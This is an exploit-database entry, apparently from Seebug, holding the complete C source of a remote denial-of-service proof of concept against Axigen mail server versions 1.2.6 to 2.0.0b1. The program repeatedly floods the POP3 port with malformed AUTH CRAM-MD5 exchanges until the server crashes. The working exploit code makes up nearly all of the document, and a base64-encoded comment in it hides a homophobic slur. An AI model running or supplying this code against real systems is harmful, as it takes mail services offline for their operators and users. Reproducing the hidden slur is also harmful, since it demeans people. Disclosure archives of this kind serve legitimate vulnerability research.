Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-6166", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-09T00:00:00", "title": "Axigen <= 2.0.0b1 Remote Denial of Service Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6166", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2007-02-09T00:00:00", "sourceData": "\n /* doaxigen.c\r\n *\r\n * axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)\r\n * by mu-b - Sat Oct 22 2006\r\n *\r\n * - Tested on: AXIGEN 1.2.6 (lnx)\r\n * AXIGEN 2.0.0b1 (lnx)\r\n *\r\n * 0x08088054: parsing error results in DoS (little-endian, confirmed)\r\n * DoS + off-by-one heap smash (big-endian)\r\n *\r\n * Note: if you receive a SIGPIPE then you crashed the server\r\n * but at too high a memory address... try again.\r\n */\r\n\r\n/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n\r\n#define BUF_SIZE 1024\r\n#define BBUF_SIZE BUF_SIZE/3*4+1\r\n\r\n#define AUTH_CMD "AUTH CRAM-MD5\\r\\n"\r\n#define QUIT_CMD "QUIT\\r\\n"\r\n\r\n#define DEF_PORT 110\r\n#define PORT_POP3 DEF_PORT\r\n\r\n#define RCNT_DELAY 3\r\n\r\nstatic const char base64tab[] =\r\n "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";\r\n\r\nstatic int base64 (const u_char * ibuf, u_char * obuf, size_t n);\r\nstatic int sock_send (int sock, u_char * src, int len);\r\nstatic int sock_recv (int sock, u_char * dst, int len);\r\nstatic void zhammer (u_char * host);\r\n\r\nstatic int\r\nbase64 (const u_char * ibuf, u_char * obuf, size_t n)\r\n{\r\n int a, b, c;\r\n int i, j;\r\n int d, e, f, g;\r\n\r\n a = b = c = 0;\r\n for (j = i = 0; i < n; i += 3)\r\n {\r\n a = (u_char) ibuf[i];\r\n b = i + 1 < n ? (u_char) ibuf[i + 1] : 0;\r\n c = i + 2 < n ? (u_char) ibuf[i + 2] : 0;\r\n\r\n d = base64tab[a >> 2];\r\n e = base64tab[((a & 3) << 4) | (b >> 4)];\r\n f = base64tab[((b & 15) << 2) | (c >> 6)];\r\n g = base64tab[c & 63];\r\n\r\n if (i + 1 >= n)\r\n f = '=';\r\n if (i + 2 >= n)\r\n g = '=';\r\n\r\n obuf[j++] = d, obuf[j++] = e;\r\n obuf[j++] = f, obuf[j++] = g;\r\n }\r\n\r\n obuf[j++] = '\\0';\r\n\r\n return strlen (obuf);\r\n}\r\n\r\nstatic int\r\nsock_send (int sock, u_char * src, int len)\r\n{\r\n int sbytes;\r\n\r\n sbytes = send (sock, src, len, 0);\r\n\r\n return (sbytes);\r\n}\r\n\r\nstatic int\r\nsock_recv (int sock, u_char * dst, int len)\r\n{\r\n int rbytes;\r\n\r\n rbytes = recv (sock, dst, len, 0);\r\n if (rbytes >= 0)\r\n dst[rbytes] = '\\0';\r\n\r\n return (rbytes);\r\n}\r\n\r\nstatic int\r\nsockami (u_char * host, int port)\r\n{\r\n struct sockaddr_in address;\r\n struct hostent *hp;\r\n int sock;\r\n\r\n fflush (stdout);\r\n if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)\r\n {\r\n perror ("socket()");\r\n exit (-1);\r\n }\r\n\r\n if ((hp = gethostbyname (host)) == NULL)\r\n {\r\n perror ("gethostbyname()");\r\n exit (-1);\r\n }\r\n\r\n memset (&address, 0, sizeof (address));\r\n memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);\r\n address.sin_family = AF_INET;\r\n address.sin_port = htons (port);\r\n\r\n if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)\r\n {\r\n perror ("connect()");\r\n exit (EXIT_FAILURE);\r\n }\r\n\r\n return (sock);\r\n}\r\n\r\nstatic void\r\nzhammer (u_char * host)\r\n{\r\n int sock, rbytes;\r\n u_int i;\r\n u_char *md5 = "\\" d339490346794f964736669ae26e29df"; /* what was that? */\r\n u_char sbuf[BBUF_SIZE], *sptr;\r\n u_char rbuf[BUF_SIZE];\r\n\r\n fd_set r_fds;\r\n struct timeval tv;\r\n\r\n base64 (md5, sbuf, strlen (md5));\r\n sptr = sbuf + strlen (sbuf);\r\n *sptr++ = '\\r', *sptr++ = '\\n', *sptr = '\\0';\r\n\r\n printf ("+Connecting to %s:%d.", host, PORT_POP3);\r\n sock = sockami (host, PORT_POP3);\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n if (rbytes < 0)\r\n return;\r\n\r\n for (i = 0; i < -1; i++)\r\n {\r\n int rbytes;\r\n\r\n sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n if (rbytes < 0)\r\n break;\r\n\r\n sock_send (sock, sbuf, strlen (sbuf));\r\n\r\n FD_ZERO (&r_fds);\r\n FD_SET (sock, &r_fds);\r\n tv.tv_sec = 4; /* wait 4 seconds */\r\n tv.tv_usec = 0;\r\n\r\n rbytes = select (sock + 1, &r_fds, NULL, NULL, &tv);\r\n if (rbytes == -1) /* oh dear */\r\n perror ("select()");\r\n else if (rbytes) /* read response */\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n else /* timeout, server appears to have crashed!@$%! */\r\n break;\r\n\r\n /* hmmm, too many attempts, must re-connect... */\r\n if (strstr (rbuf, "(maximum number of protocol errors reached)"))\r\n {\r\n close (sock);\r\n sleep (RCNT_DELAY);\r\n\r\n printf ("\\n+Reconnecting to %s:%d.", host, PORT_POP3);\r\n sock = sockami (host, PORT_POP3);\r\n rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);\r\n }\r\n\r\n if (rbytes < 0)\r\n break;\r\n\r\n if (!((i + 1) % 4))\r\n printf ("..%d", i + 1);\r\n\r\n fflush (stdout);\r\n usleep (1000);\r\n }\r\n\r\n printf ("\\n");\r\n}\r\n\r\nint\r\nmain (int argc, char **argv)\r\n{\r\n printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\\n"\r\n "by: <mu-b@digit-labs.org>, <mu-b@65535.com>\\n\\n");\r\n\r\n if (argc <= 1)\r\n {\r\n fprintf (stderr, "Usage: %s <host>\\n", argv[0]);\r\n exit (EXIT_SUCCESS);\r\n }\r\n\r\n zhammer (argv[1]);\r\n\r\n printf ("+Wh00t!\\n");\r\n\r\n return (EXIT_SUCCESS);\r\n}\n ", "id": "SSV:6166", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:10:23", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "canvas", "idList": ["MU"]}]}, "exploitation": null, "vulnersScore": 0.5}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850}}
{}
Axigen <= 2.0.0b1 Remote Denial of Service Exploit